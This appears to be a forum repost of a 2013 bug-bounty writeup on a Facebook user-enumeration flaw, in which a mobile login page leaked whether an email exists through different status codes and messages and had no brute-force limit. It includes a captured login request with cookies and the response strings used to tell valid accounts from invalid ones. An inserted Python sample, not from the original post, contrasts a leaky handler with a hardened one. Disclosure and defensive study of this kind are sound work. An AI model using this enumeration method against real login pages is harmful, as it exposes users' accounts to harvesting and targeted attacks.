florin_darck

Facebook User Enumeration Vulnerability


Posted

Facebook User Enumeration Vulnerability By Bypassing Brute Force Protection

==============================

Bug Status - Reported On 3-5-2013

Fixed On - 12-6-2013

Reward - $1000

=============================

Before we go further, if you don't know about the User Enumeration vulnerability, see below.

User Enumeration is a technique or vulnerability which can allow an attacker to enumerate all emails, user names or sensitive information about any user which already exists in the target vulnerable web application.

So let's move to our testing part.

If I talk about myself, I didn't try for XSS, CSRF or any other common bug. I always try to find some logical or unique bug.

So I was searching for this type of bug on iphone.facebook.com, which is a special version for iPhone users where they can browse FB on their iPhone.

Now here is where the interesting part came.

You all know that every web application has its forgot-your-password and registration forms,

where a user can reset their password and create a new account.

Let's think about what an attacker can do with these two forms... hmmmmmmmmmmmmmmmmmmm :-)

Yes, he can check which email addresses already exist in that web application by performing a mass brute force attack.

So I tried to perform this attack on the forgot-your-password forms of iphone.facebook.com and m.facebook.com, but everyone knows that Facebook has its own internal brute force detection mechanism, so no one can easily perform this type of attack.

As a result of this attack I found that after 10 attempts Facebook was blocking my requests, so I was unable to perform this attack here. I tried to bypass it but didn't get anything there.

Then finally I found a flaw of improper request handling in the iphone.facebook.com login panel for users.

http://1.bp.blogspot.com/-bNNKQenh-2Y/UqU9yFIr7aI/AAAAAAAAAoQ/JQTiOHU6syo/s1600/POC+1.jpg

Like in a normal web application, if you enter only the email without giving a password then the web application will give you an error like "Please Enter Email & Password Or You Entered An Invalid Email Or Password".

But on iphone.facebook.com there is some mistake in the request & response. If I enter only the email in the login panel without giving a password then I get an error that says "We didn't recognize your email address".

Hmmmmmmmmmmmm

This means we can enumerate all the email addresses of existing email IDs, but maybe Facebook can also block our requests like it did last time. But this time, instead of blocking my requests, it is giving me a "Different Response Code For Existing Or Non Existing Email Id":

200 for a non-existing & 302 for an existing email

http://4.bp.blogspot.com/-ajYYfaFTV_o/UqL8hjsN0wI/AAAAAAAAAnM/fssvqe4zdn8/s1600/POC+4.jpg

POC

But one thing is still in mind: how is it possible that Facebook's brute force mechanism failed to detect my attempts?

Because Facebook had forgotten to add the brute force mechanism on this particular login page,

that's why I was able to perform this kind of attack here.

Now the bug is fixed :-)

Source: Web And Information Security
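As an added illustration (not code from the post or from Facebook), the toy handler below reproduces the two things the writeup describes: a login endpoint whose status code and message differ for existing and non-existing accounts, with no attempt counting, beside a hardened version that answers every failure the same way and caps attempts per client. It assumes a constructed in-memory user store and hypothetical function names.

```python
import hmac
from collections import defaultdict

# Constructed sample user store (plaintext passwords only to keep the toy short).
USERS = {"alice@example.com": "correct horse"}
DUMMY_SECRET = "no-such-user"          # compared when the account does not exist
ATTEMPT_LIMIT = 10                     # the post saw lockout after 10 attempts elsewhere
_attempts = defaultdict(int)           # failed attempts per client address


def vulnerable_login(email, password, client_ip=None):
    """Mimics the leaky behaviour the post describes: the status code and the
    message both reveal whether the email belongs to an account, and nothing
    counts attempts (client_ip is ignored on purpose)."""
    if email not in USERS:
        return 200, "We didn't recognize your email address."
    if password != USERS[email]:
        return 302, "Your password was incorrect."
    return 302, "/home"


def hardened_login(email, password, client_ip):
    """Fixed variant: one status code and one message for every failure, a
    constant-time compare even for unknown accounts, and a per-client cap."""
    _attempts[client_ip] += 1
    if _attempts[client_ip] > ATTEMPT_LIMIT:
        return 429, "Too many attempts. Please try again later."
    stored = USERS.get(email, DUMMY_SECRET)
    # Compare first, then check membership, so unknown accounts take the same path.
    ok = hmac.compare_digest(stored.encode(), password.encode()) and email in USERS
    if not ok:
        return 200, "The email address or password you entered is incorrect."
    _attempts.pop(client_ip, None)
    return 302, "/home"


def leaks_account_existence(handler, known_email, unknown_email, client_ip="probe"):
    """Defender's regression check: submit an empty password for an address that
    exists and for one that does not; any difference in the reply is an oracle."""
    return handler(known_email, "", client_ip) != handler(unknown_email, "", client_ip)


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_login), ("hardened", hardened_login)):
        leak = leaks_account_existence(handler, "alice@example.com", "nobody@example.com")
        print(f"{name}: account existence leaks = {leak}")
```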

Posted
Host: iphone.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://iphone.facebook.com/login.php?refsrc=https%3A%2F%2Fiphone.facebook.com%2F&refid=9&e=1348028&email=snoop_sssad%40yahoo.com&signup_layout=layout%7Clower_subdued_button%7C%7Cs_btn%7Cspecial%7C%7Cl_btn%7Cconfirm%7C%7Csignupinstr%7C%7Clogininstr%7C%7Cst%7Ccreate%7C%7Claunched_Jan9&li=5wgCU1xZ4nhIM-Ad4b_WiSQK&_rdr
Cookie: datr=rv7lUj4TLFlhAWGlHvS9xvcC; fr=0CX1ISfPWgHY98GtH.AWW21Ok89H0jKJ-AHRjFqvfyWjw.BS5f65.Hr.FMB.AWXndWPa; lu=TA25WbjfGRRCk4ptWyoz70KA; locale=en_US; reg_fb_gate=http%3A%2F%2Fiphone.facebook.com%2F; reg_fb_ref=https%3A%2F%2Fiphone.facebook.com%2Flogin.php%3Frefsrc%3Dhttps%253A%252F%252Fiphone.facebook.com%252F%26refid%3D9%26e%3D1348028%26email%3Dsnoop_sssad%2540yahoo.com%26signup_layout%3Dlayout%257Clower_subdued_button%257C%257Cs_btn%257Cspecial%257C%257Cl_btn%257Cconfirm%257C%257Csignupinstr%257C%257Clogininstr%257C%257Cst%257Ccreate%257C%257Claunched_Jan9%26li%3D5wgCU1xZ4nhIM-Ad4b_WiSQK; m_ts=1392642569; sfiu=AYjAEYnDRFu1ODLJXhzRo2R_qdcLthL7thmlJVinxvzMKied5NqQ8RhEUsWygYC16lJZeuhomQwo5gg8jL9RQVC3Bu9Vz0owCfflGcI3u3xpKUFk8KDugUWdKuaSikjbZFHsTfJBMHdjmrc-rvjWkONIq0Fbfo1vQNNv9lJCgKruqQ
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 380

Post body:

lsd=AVrRrtFU&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&version=1&ajax=0&width=0&pxr=0&gps=0&signup_layout=layout%7Clower_subdued_button%7C%7Cs_btn%7Cspecial%7C%7Cl_btn%7Cconfirm%7C%7Csignupinstr%7C%7Clogininstr%7C%7Cst%7Ccreate%7C%7Claunched_Jan9&email=sdfdg3334f@yahoo.com&pass=&login=Log+In

We didn't recognize your email address. = invalid

Your password was incorrect. = valid

or

Alternatively, we can send you a message with a link you can use to easily login. = valid
